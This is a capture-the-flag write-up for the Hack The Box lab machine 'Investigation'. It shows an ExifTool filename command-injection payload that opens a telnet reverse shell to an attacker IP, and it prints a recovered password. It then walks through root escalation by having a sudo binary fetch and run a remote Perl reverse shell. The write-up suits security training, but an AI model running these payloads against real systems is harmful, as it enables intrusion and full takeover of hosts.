
Write up for the HTB machine 'Investigation'

1. Initial Recon

1.1. nmap

cmd nmap -sC -sV

  • From the nmap scan we get the url http://eforenzics.htb/ which we can add to /etc/hosts

  • We have port 22 ssh and port 80 http

1.2. nikto

cmd nikto -host

  • found nothing interesting

2. website recon

  • /service.html has a file upload service

    • uploading any image file reveals the ExifTool Version Number 12.37

2.1. ExifTool

A quick google search for ExifTool reveals a command injection vulnerability for that version number


    • Exiftool versions < 12.38 are vulnerable to Command Injection through a crafted filename. If the filename passed to exiftool ends with a pipe character | and exists on the filesystem, then the file will be treated as a pipe and executed as an OS command.

Our payload will be in the name of the file that we upload to the web application

After trying some payloads from revshells we can eventually use:

  • payload: TF=$(mktemp -u);mkfifo $TF && telnet 10.10.x.x 4444 0<$TF | sh 1>$TF |

3. user.txt

Once we have our reverse shell let's obtain a fully interactive shell with: python3 -c 'import pty;pty.spawn("/bin/bash");'

3.1. file system recon

After some recon of the file system we find the directory /usr/local/investigation

  • from here we can also find our username: smorton

Let's download the files

  • On the victim machine spin up a http server using python3 -m http.server

  • On your attacking machine run curl > out.msg

3.2. .msg file

Now we need to find what to do with a .msg file. Thankfully we can use to analyse it for us, which will lead us to downloading a zip file, extract the file from the zip.

Now we've got a .evtx file and we've gotta figure out what to do with that.

  • here's a python module that can help with that

    • run python3 security.evtx > out.json

In the event logs we can look for basic logon events Audit logon events (Windows)

  • The code 4625 is for a Logon failure. A logon attempt was made with an unknown user name or a known user name with a bad password.

We can search for this in the event log using grep

  • cat out.json | grep "4625" -C 10 > grep.out

From the output of our grep command we can find a password: Def@ultf0r3nz!csPa$$

Now we can ssh into the machine with the credentials


navigate to /home/smorton for user.txt

4. root.txt

when we run sudo -l we can see that there's a binary the user is allowed to run

User smorton may run the following commands on investigation:
    (root) NOPASSWD: /usr/bin/binary

So let's investigate this binary. Same as above let's spin up a http server using python3 on the victim machine and download the binary

  • run python3 -m http.server on the victim machine

  • run curl > binary.out on your attacking machine

4.1. investigating the binary

let's start by running strings binary.out

perl ./%s
rm -f ./lDnxUysaQn

from this we can gather that

  • perl is being run on a string

  • lDnxUysaQn has some significance

4.1.1. binary ninja

binary ninja allows us to decompile the binary and get an idea of what the main function of the binary is doing

0000144a if (argc != 3) 
00001453 puts(str: "Exiting... ") 
0000145d exit(status: 0) 
0000145d noreturn 
00001469 if (getuid() != 0) 
00001472 puts(str: "Exiting... ") 
0000147c exit(status: 0) 
0000147c noreturn 
0000149d if (strcmp(argv[2], "lDnxUysaQn") != 0) 
00001687 puts(str: "Exiting... ") 
00001691 exit(status: 0) 
00001691 noreturn 
000014aa puts(str: "Running... ") 
000014c4 FILE* rax_8 = fopen(filename: argv[2], mode: &data_2027) 
000014cd int64_t rax_9 = curl_easy_init() 
000014d6 int32_t var_40 = 0x2712 
000014f9 curl_easy_setopt(rax_9, 0x2712, argv[1], 0x2712) 
000014fe int32_t var_3c = 0x2711 
0000151a curl_easy_setopt(rax_9, 0x2711, rax_8, 0x2711) 
0000151f int32_t var_38 = 0x2d 
0000153c curl_easy_setopt(rax_9, 0x2d, 1, 0x2d) 
00001554 if (curl_easy_perform(rax_9) != 0) 
00001671 puts(str: "Exiting... ") 
0000167b exit(status: 0) 
0000167b noreturn 
00001583 int64_t rax_25 = sx.q(snprintf(s: nullptr, maxlen: 0, format: &data_202a, argv[2])) 
00001594 char* rax_28 = malloc(bytes: rax_25 + 1) 
000015c6 snprintf(s: rax_28, maxlen: rax_25 + 1, format: &data_202a, argv[2]) 
000015ed int64_t rax_37 = sx.q(snprintf(s: nullptr, maxlen: 0, format: "perl ./%s", rax_28)) 
000015fe char* rax_40 = malloc(bytes: rax_37 + 1) 
00001629 snprintf(s: rax_40, maxlen: rax_37 + 1, format: "perl ./%s", rax_28) 
00001635 fclose(fp: rax_8) 
00001641 curl_easy_cleanup(rax_9) 
0000164b setuid(uid: 0) 
00001657 system(line: rax_40) 
00001663 system(line: "rm -f ./lDnxUysaQn")

from this we can gather

  • the program requires 2 arguments (line 1)

  • the second argument must be lDnxUysaQn (line 9)

  • curl is being used on argument 1 (line 17, line 22)

  • perl is being run with system (line 31, line 35)

so let's construct a command to run on the victim machine so that it meets the above requirements

4.1.2. final payload

sudo /usr/bin/binary 10.10.x.x:80/ lDnxUysaQn

  • we need to be running the binary as sudo, so we need sudo /usr/bin/binary at the start

  • the first argument is being curled, so let's use python3 -m http.server 80 to host our payload

    • 10.10.x.x:80/ is so the binary curls from our machine

  • perl is being run, so let's make our payload a perl script for a reverse shell

  • finally, lDnxUysaQn is required at the end

Spin up the http server on your attacking machine along with a netcat listener

finally, our netcat listener will catch a reverse shell as the root user.

Last updated